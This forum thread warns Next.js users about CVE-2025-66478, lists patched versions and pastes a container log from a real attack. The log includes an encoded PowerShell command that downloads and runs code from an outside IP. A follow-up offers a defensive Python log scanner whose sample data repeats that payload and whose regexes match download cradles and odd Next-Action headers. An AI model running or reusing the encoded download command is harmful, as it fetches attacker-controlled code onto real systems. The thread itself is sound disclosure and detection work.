
One of our services was attacked today. Luckily, containerisation plus alerting meant there were no serious consequences. Everyone, please check as soon as possible whether your Next.js version is affected, and upgrade to a fixed release.
https://nextjs.org/blog/CVE-2025-66478
The vulnerability is fully resolved in the following patched Next.js versions:
15.0.5 15.1.9 15.2.6 15.3.6 15.4.8 15.5.7 15.6.0-canary.58 16.0.7

2025-12-05T14:26:57.261834840+08:00 /bin/sh: 1: powershell: not found
2025-12-05T14:26:57.281016164+08:00 [Error: Command failed: powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
2025-12-05T14:26:57.281027836+08:00 /bin/sh: 1: powershell: not found
2025-12-05T14:26:57.281030581+08:00 ] {
2025-12-05T14:26:57.281033386+08:00 status: 127,
2025-12-05T14:26:57.281035610+08:00 signal: null,
2025-12-05T14:26:57.281038285+08:00 output: [Array],
2025-12-05T14:26:57.281040579+08:00 pid: 54,
2025-12-05T14:26:57.281042744+08:00 stdout: <Buffer >,
2025-12-05T14:26:57.281045459+08:00 stderr: <Buffer 2f 62 69 6e 2f 73 68 3a 20 31 3a 20 70 6f 77 65 72 73 68 65 6c 6c 3a 20 6e 6f 74 20 66 6f 75 6e 64 0a>,
2025-12-05T14:26:57.281047643+08:00 digest: '1126005934'
2025-12-05T14:26:57.281049837+08:00 }

1 bearbest PRO
Dify also uses Next.js; it updated to the patched version just today.
2 shiny PRO
We were already attacked yesterday. I saw two attack types: one adds Next-Action: test#constructor in the header, which makes it initialise Test; the other executes a payload built and sent via POST.

3 simonguo OP
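The container log in the opening post shows how the attack surfaced: Node's child_process failed to run `powershell -enc …` on a Linux image, and the error carried the encoded command. As an added example (not code from this thread, from Next.js or from Vercel), here is a small Python log scanner a defender could run over such container and access logs. It decodes `-enc` arguments (PowerShell takes base64 of UTF-16LE text) and flags download-cradle indicators, and it also flags `Next-Action` header values that do not look like action ids, the pattern the second reply describes. The assumption that legitimate action ids are hex digests is mine and not something the thread states; the access-log lines and the benign id are constructed, while the encoded command is the one from the log above.

```python
"""Scan container/access logs for PowerShell download cradles and odd Next-Action headers.

Added example for this thread; not code from Next.js or from the original posts.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches the "Command failed: powershell -enc <base64>" text that Node's
# child_process error includes when a spawned command fails (as in the log above).
ENC_CMD_RE = re.compile(
    r"powershell(?:\.exe)?\s+-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Indicators of a download-and-execute cradle in the decoded script.
CRADLE_RE = re.compile(
    r"\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient"
    r"|Invoke-WebRequest|Start-BitsTransfer",
    re.IGNORECASE,
)

# Assumption (not from the thread): real server-action ids are hex digests, so a
# value such as "test#constructor" is treated as anomalous.
ACTION_ID_RE = re.compile(r"^[0-9a-f]{40,64}$")
NEXT_ACTION_RE = re.compile(r"Next-Action:\s*(\S+)", re.IGNORECASE)


@dataclass
class Finding:
    kind: str    # category of what was seen
    detail: str  # decoded script or offending header value


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a PowerShell -enc argument; return None if it is not valid base64/UTF-16LE."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def scan_line(line: str) -> List[Finding]:
    """Return findings for a single log line (possibly none)."""
    findings: List[Finding] = []
    m = ENC_CMD_RE.search(line)
    if m:
        script = decode_encoded_command(m.group(1))
        if script is None:
            findings.append(Finding("undecodable-enc", m.group(1)[:32]))
        elif CRADLE_RE.search(script):
            findings.append(Finding("powershell-download-cradle", script))
        else:
            findings.append(Finding("powershell-encoded-command", script))
    h = NEXT_ACTION_RE.search(line)
    if h and not ACTION_ID_RE.match(h.group(1)):
        findings.append(Finding("suspicious-next-action", h.group(1)))
    return findings


def scan_log(text: str) -> List[Finding]:
    """Scan every line of a log blob."""
    out: List[Finding] = []
    for line in text.splitlines():
        out.extend(scan_line(line))
    return out


# Constructed sample: the first line is the encoded command from the thread's log,
# the access-log lines (timestamps, paths, header values) are made up for this example.
SAMPLE_LOG = (
    "2025-12-05T14:26:57.281016164+08:00 [Error: Command failed: powershell -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIA"
    "YwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8A"
    "LwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA\n"
    "2025-12-05T14:26:57.281027836+08:00 /bin/sh: 1: powershell: not found\n"
    "2025-12-05T14:26:58Z POST / Next-Action: test#constructor 500\n"
    "2025-12-05T14:27:01Z POST / Next-Action: 0123456789abcdef0123456789abcdef01234567 200\n"
)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f.kind}] {f.detail}")
```

Run it as a one-off over exported container logs, or wire `scan_line` into whatever ships your logs; the useful output is the decoded script, since the raw `-enc` blob alone tells an on-call engineer nothing.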